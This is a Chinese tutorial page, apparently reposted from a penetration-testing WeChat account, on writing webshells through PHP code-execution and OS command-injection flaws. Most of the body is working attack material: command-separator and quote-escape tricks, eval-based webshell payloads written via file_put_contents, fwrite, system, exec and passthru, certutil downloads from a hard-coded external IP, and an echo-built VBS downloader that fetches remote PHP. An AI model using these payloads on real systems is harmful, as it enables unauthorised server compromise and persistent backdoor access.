您当前的位置:首页 > 电脑百科 > 安全防护 > 黑客技术

通过代码执行或命令执行写Shell

时间:2021-08-11 09:53:44  来源:  作者:暗网视界

公众号:白帽子左一
专注分享渗透经验,干货技巧...

本文由团队手电筒分享,如果你还是个小白担心看不懂,没关系,“三步写马””如何上传木马”“如何拿下服务器并妥善管理”等实战内容可以结合视频观看,视频演示先从原理,再到实操演示,一步步清晰明了,更易吸收,视频私信我

php

一.命令执行


 

命令执行(注入)常见可控位置情况有下面几种:

system("$arg"); //可控点直接是待执行的程序

如果我们能直接控制$arg,那么就能执行执行任意命令了。

 

system("/bin/prog $arg"); //可控点是传入程序的整个参数

 

我们能够控制的点是程序的整个参数,我们可以直接用&& || 或 | 等等,利用与、或、管道命令来执行其他命令(可以涉及到很多linux命令行技巧)。

 

system("/bin/prog -p $arg"); //可控点是传入程序的某个参数的值(无引号包裹)

 

我们控制的点是一个参数,我们也同样可以利用与、或、管道来执行其他命令,情境与二无异。

 

system("/bin/prog -p="$arg"");//可控点是传入程序的某个参数的值(有双引号包裹)

 

这种情况压力大一点,有双引号包裹。

如果引号没有被转义,我们可以先闭合引号,成为第三种情况后按照第三种情况来利用,如果引号被转义(addslashes)、我们也不必着急。

linux shell 环境下双引号中间的变量也是可以被解析的,我们可以在双引号内利用反引号执行任意命令 id

system("/bin/prog --p='$arg'"); //可控点是传入程序的某个参数的值(有单引号包裹)

这是最困难的一种情况

因为单引号内只是一个字符串,我们要先闭合单引号才可以执行命令。

如:system(“/bin/prog –p=’aaa’ | id”)

 

在漏洞检测中,除了有回显的命令

还可以使用盲打的方式,比如curl远程机器的某个目录(看access.log),或者通过DNS解析的方式获取到漏洞机器发出的请求。

当我们确定了OS命令注入漏洞后,通常可以执行一些初始命令来获取有关受到破坏的系统的信息。

以下是在Linux和windows平台上常用的一些命令的摘要:

命令目的

linux

windows

当前用户名

whoami

whoami

操作系统

uname -a

ver

网络配置

ifconfig

ipconfig /all

网络连接

netstat -an

netstat -an

运行进程

ps -ef

tasklist

 

命令分隔符

在Linux上, ; 可以用 |、|| 代替

;前面的执行完执行后面的

|是管道符,显示后面的执行结果

||当前面的执行出错时执行后面的

可用**%0A和 n**换行执行命令

在Windows上,不能用 ; 可以用&、&&、|、||代替

&前面的语句为假则直接执行后面的

&&前面的语句为假则直接出错,后面的也不执行

|直接执行后面的语句

||前面出错执行后面的

PHP 支持一个执行运算符:反引号(``) PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回

<?php echo `whoami`;?>

效果与函数 shell_exec() 相同,都是以字符串的形式返回一个命令的执行结果,可以保存到变量中

 

二.代码执行


此处以php为例,其它语言也存在这类利用。

 

(1) preg_replace()函数:

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [,int $limit =-1[,int&$count ]])

当$pattern处存在e修饰符时,$replacement 会被当做php代码执行。

 

(2)mixed call_user_func( callable $callbank [ , mixed $parameter [ , mixed

$…):

第一个参数为回调函数,第二个参数是回调函数的参数

通过代码执行或命令执行写Shell

 


通过代码执行或命令执行写Shell

 

(3)eval()和assert():

当assert()的参数为字符串时 可执行PHP代码

 

【区分】:

eval(" phpinfo(); ");【√】eval(" phpinfo() ");【X】
assert(" phpinfo(); ");【√】assert(" phpinfo() ");【√】

 

三.反序列化


 

php反序列化导致RCE的原理及利用,参考专题文章:

通过代码执行或命令执行写Shell

 

文库 | 反序列化漏洞汇总

 

四.通过代码执行或命令执行写shell


代码执行写shell

当遇到一个可以代码执行的位置时,我们可以通过写webshell来进行进一步渗透

1.file_put_contents函数

file_put_contents函数格式为file_put_contents(filename,data)

指定写入文件名和写入文件的数据
可以通过这个函数去写入数据

这里用了网上的漏洞测试的平台

测试语句为:

file_put_contents('gt.php','<?php eval($_REQUEST[5]);?>');
通过代码执行或命令执行写Shell

 

访问文件

通过代码执行或命令执行写Shell

 

2.fopen() 创建文件函数

fopen函数,格式为fopen(filename,mode) 前面是文件名,后面是规定要求到该文件/流的访问类型

它的作用是打开文件或url,这里当后续命令为w,或W+ 时,当文件不存在的话就会新建一个文件
然后再用fwrite去写入数据


fwrite()写入文件函数,格式为fwrite(file,string),这里file是文件名,string是写入的字符串

这里注意如果是通过assert函数去代码执行,那么只允许一条语句去执行

这里可以把两个命令写一起
例如

fwrite(fopen('z23.php','a'),'<?php phpinfo(); ?>');

执行效果如下
执行语句

fwrite(fopen('z23.php','a'),'<?php phpinfo(); ?>');
通过代码执行或命令执行写Shell

 

访问文件

通过代码执行或命令执行写Shell

 

3.fputs函数

Fputs函数也是php里一个用于写入文件的函数,它其实是fwrite的别名
基本用法和fwrite一样
测试语句为

fputs(fopen('tk.php','w'),'<?php phpinfo();?>');

执行语句

fputs(fopen('tk.php','w'),'<?php phpinfo();?>');
通过代码执行或命令执行写Shell

 

访问文件

通过代码执行或命令执行写Shell

 

4.通过执行命令执行函数去写shell

通过代码执行漏洞去执行代码脚本调用操作系统命令
常用函数有

system()

exec()

shell_exec()

passthru()

pcntl_exec()

popen()

proc_open()
这里我们只挑选其中部分来测试,其他的道理差不多


4.1、首先为system()

测试语句为

system(' echo "<?php @eval($_REQUEST[8])?>" >pp.php ');
通过代码执行或命令执行写Shell

 

然后访问文件测试下

通过代码执行或命令执行写Shell

 

测试完成

 

4.2、exec()函数

测试语句如下

exec(' echo "<?php @eval($_REQUEST[8])?>" >ppl.php ');

在本地执行下

通过代码执行或命令执行写Shell

 

访问生成文件

通过代码执行或命令执行写Shell

 

4.3、shell_exec()函数

测试语句为

shell_exec(' echo "<?php @eval($_REQUEST[8])?>" >ppk.php ');

在本地执行测试

通过代码执行或命令执行写Shell

 

访问生成文件

通过代码执行或命令执行写Shell

 

4.4、passthru()函数

测试语句为

passthru(' echo "<?php @eval($_REQUEST[8])?>" >ppm.php ');

在本地测试

通过代码执行或命令执行写Shell

 

访问生成文件

通过代码执行或命令执行写Shell

 

命令执行写webshell

通过cmd命令去写入


通过cmd里的echo去写入webshell


命令如下

echo "<?php @eval($_REQUEST[8])?>">223.php

执行如下

通过代码执行或命令执行写Shell

 

返回页面如下

通过代码执行或命令执行写Shell

 

访问223.php

通过代码执行或命令执行写Shell

 

通过命令执行去远程下载shell

利用windows的certutil命令
例:

certutil -urlcache -split -f http://129.211.169.121/123.php

通过windows的certutil去在外部下载文件
这个certutil是windows系统上预装的工具,一般用于校验md5,sha1,sha256,下载文件


执行这个需要相当高的权限,

在搭建的服务器上安装好环境


在本地测试一下

执行命令

certutil -urlcache -split -f http://129.211.169.121/123.php
通过代码执行或命令执行写Shell

 

得到结果

通过代码执行或命令执行写Shell

 

得到返回文件

通过代码执行或命令执行写Shell

 

访问效果如下

通过代码执行或命令执行写Shell

 

通过vbs去建立脚本去下载

vbs是基于visual Basic的脚本语言,一般windows设备自带

这里我们通过命令执行去写入脚本,然后再通过命令执行去下载shell


测试脚本如下

Set args =Wscript.Arguments
Url="http://129.211.169.121/1234.php"
dim xHttp:Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm:Set bStrm = createobject("Adodb.Stream")
xHttp.Open"GET",Url,False
xHttp.Send
with bStrm
.type =1
.open
.write xHttp.responseBody
.savetofile "12345.php",2
endwith

先再远程机器上设立一个php文件名为1234.php
内容为

<?php
echo “<?php phpinfo();?>”;
?>

 

为什么要这样写呢?

这个脚本是直接读取远程机器上的文件信息然后写入到一个文件里,我们通过读取这个php页面显示的语句去获得shell内容

 

然后我们在页面里去写入vbs文件,这里脚本内容过长,且有换行,我们通过echo 一条条写入命令,和前面命令执行写shell一样

 

echo Set args =Wscript.Arguments> xxx.vbs

echo Url="http://129.211.169.121/1234.php">>xxx.vbs

echo dim xHttp:Set xHttp = createobject("Microsoft.XMLHTTP")>>xxx.vbs

echo dim bStrm:Set bStrm = createobject("Adodb.Stream")>>xxx.vbs

echo xHttp.Open"GET",Url,False>>xxx.vbs

echo xHttp.Send>>xxx.vbs

echo with bStrm >>xxx.vbs

echo .type =1>>xxx.vbs

echo .open >>xxx.vbs

echo .write xHttp.responseBody >>xxx.vbs

echo .savetofile "12345.php",2>>xxx.vbs

echo endwith>>xxx.vbs

后续内容通过>> 换行写入

 

得到xxx.vbs文件

通过代码执行或命令执行写Shell

 

然后在存在命令执行处执行命令去下载文件

 

执行命令 start wscript -e:vbs xxx.vbs

通过代码执行或命令执行写Shell

 

然后得到文件

通过代码执行或命令执行写Shell

 

去访问

通过代码执行或命令执行写Shell

 

未完待续...



Tags:Shell   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
写一个shell获取本机ip地址、网关地址以及dns信息。经常会遇到取本机ip、网关、dns地址,windows一个命令ipconfig /all全部获取到,但linux系统却并非如此。linux系统都自带ifc...【详细内容】
2021-12-27  Tags: Shell  点击:(0)  评论:(0)  加入收藏
什么是shellshell是c语言编写的程序,它在用户和操作系统之间架起了一座桥梁,用户可以通过这个桥梁访问操作系统内核服务。 它既是一种命令语言,同时也是一种程序设计语言,你可以...【详细内容】
2021-12-16  Tags: Shell  点击:(16)  评论:(0)  加入收藏
我们经常用到netstat命令查看主机连接状况,包括连接ip、端口、状态等,今天就练习下shell分析netsat结果。描述假设netstat命令运行的结果我们存储在nowcoder.txt里,格式如下:Pro...【详细内容】
2021-12-14  Tags: Shell  点击:(19)  评论:(0)  加入收藏
前言目标是一大学,在一次挖洞过程中遇到个sql注入,尝试进一步利用扩大危害,漏洞已报送平台进行了修复私信我获取网络安全学习资料 1.2000多本网络安全系列电子书 2.网络安全标...【详细内容】
2021-11-26  Tags: Shell  点击:(21)  评论:(0)  加入收藏
如何在Linux环境中加密shell脚本?shell脚本包含密码,不希望其他具有执行权限的人查看shell脚本并获取密码。可以安装使用shc工具,普通用户无法读取shc创建的加密Shell...【详细内容】
2021-11-04  Tags: Shell  点击:(40)  评论:(0)  加入收藏
ZheTian强大的远程加载和执行ShellCode工具,免杀shellcode加载框架命令详解-u string:从远程服务器加载base64混淆后的字节码。-r string:从本地文件内读。-s string:读取修改的...【详细内容】
2021-10-21  Tags: Shell  点击:(75)  评论:(0)  加入收藏
最近工作中需要开发前端操作远程虚拟机的功能,简称 WebShell。基于当前的技术栈为 react+django,调研了一会发现大部分的后端实现都是 django+channels 来实现 websocket 服务。...【详细内容】
2021-09-13  Tags: Shell  点击:(52)  评论:(0)  加入收藏
公众号:白帽子左一 专注分享渗透经验,干货技巧...本文由团队手电筒分享,如果你还是个小白担心看不懂,没关系,“三步写马””如何上传木马”“如何拿下服务器并妥善管理”等实战内...【详细内容】
2021-08-11  Tags: Shell  点击:(115)  评论:(0)  加入收藏
shell脚本是一个命令语言,面向的是操作系统执行。如果写过shell脚本的话,应该体会过编写过程的痛苦。因为shell并不是一个编程语言,并不支持常见的数组,JSON等数据结构,也不支持...【详细内容】
2021-08-09  Tags: Shell  点击:(109)  评论:(0)  加入收藏
redpill项目旨在帮助广大研究人员在后渗透任务中实现反向TCP Shell。在日常的红队活动中,我们经常需要使用非常规的方式来访问目标系统,比如说通过反向TCP Shell来绕过系统管...【详细内容】
2021-07-21  Tags: Shell  点击:(118)  评论:(0)  加入收藏
▌简易百科推荐
一、背景介绍作为一名渗透测试工作人员(或者小白),在我们的日常工作或者学习中,我们不可能时时刻刻将自己的个人电脑(安装好Kali Linux的个人主机)带在身边,当我们没有带自己的个人...【详细内容】
2021-12-27  Kali与编程    Tags:Kali Linux   点击:(2)  评论:(0)  加入收藏
我们都知道公司网络中开放的端口越多,遭受网络攻击的可能性就越大,就越容易发生数据泄露事件。 在这篇文章中,我们将讨论与开放端口相关的网络安全隐患。 网络中的端口 据统计...【详细内容】
2021-12-10  诺必达云服务    Tags:端口扫描   点击:(33)  评论:(0)  加入收藏
一、背景介绍DirBuster是用来探测web服务器上的目录和隐藏文件的。因为DirBuster是采用java编写的,所以运行前要安装上java的环境。 来看一下基本的使用: ①:TargetURL下输入要...【详细内容】
2021-12-07  Kali与编程    Tags:Dirbuster   点击:(27)  评论:(0)  加入收藏
#本文仅用于网络安全研究学习任何未经授权的入侵都是违法行为dir 浏览 创建文件 echo 文件内容 > 文件名字.扩展名 浏览文件内容 type 文件名 分页浏...【详细内容】
2021-12-07  WHOAMI    Tags:黑客   点击:(22)  评论:(0)  加入收藏
上一节中我们学了如何实现ARP断网攻击,本节中我们将利用ARP欺骗的原理实现截取目标计算机图片流量,内容包括:&uuml;如何开启ip转发&uuml;怎样截取受害机图片流量 一、开启ip转...【详细内容】
2021-11-23  Kali与编程    Tags:黑客   点击:(22)  评论:(0)  加入收藏
一、背景介绍大家在Linux的日常使用中都晓得如何通过命令行去配置Linux的端口开放规则,但是大家知道如何配置Windows入站出站规则吗?有哪些常见的危险端口呢?如何解决上述问题...【详细内容】
2021-11-15  Kali与编程    Tags:端口   点击:(38)  评论:(0)  加入收藏
1.背景介绍几乎每一个玩渗透的人都会接触到metasploit framework,简称msf。这是一个渗透测试框架,用ruby语言编写的,该框架集成了很多可用的exploit,比如著名的ms08_067等。你可...【详细内容】
2021-11-15  Kali与编程    Tags:服务扫描   点击:(37)  评论:(0)  加入收藏
在前面的课程中,我们学习了ARP攻击的理论和实践知识,知道了怎么进行攻击,这节中我们将学习如何进行防御,内容包括:&uuml;借助第三方软件防御(360安全卫士,腾讯管家等)&uuml;使用arp...【详细内容】
2021-11-13  Kali与编程    Tags:白帽   点击:(32)  评论:(0)  加入收藏
简介在sqlmap基础上增加了目录扫描、hash爆破等功能运行环境 linux 在云服务器上还是蛮不错的项目连接如下https://github.com/s0md3v/sqlmat usage: sqlmate [-h] [--dor...【详细内容】
2021-11-10  暗网视界    Tags:sqlmate   点击:(44)  评论:(0)  加入收藏
一、背景介绍在网上冲浪少不了用到搜索引擎,而很多朋友都习惯把Google视为第一个选择对象。当然Google无论在搜索速度还是结果关联性方面都是十分优秀的。但百度(http://www.b...【详细内容】
2021-11-05  Kali与编程    Tags:白帽黑客   点击:(31)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条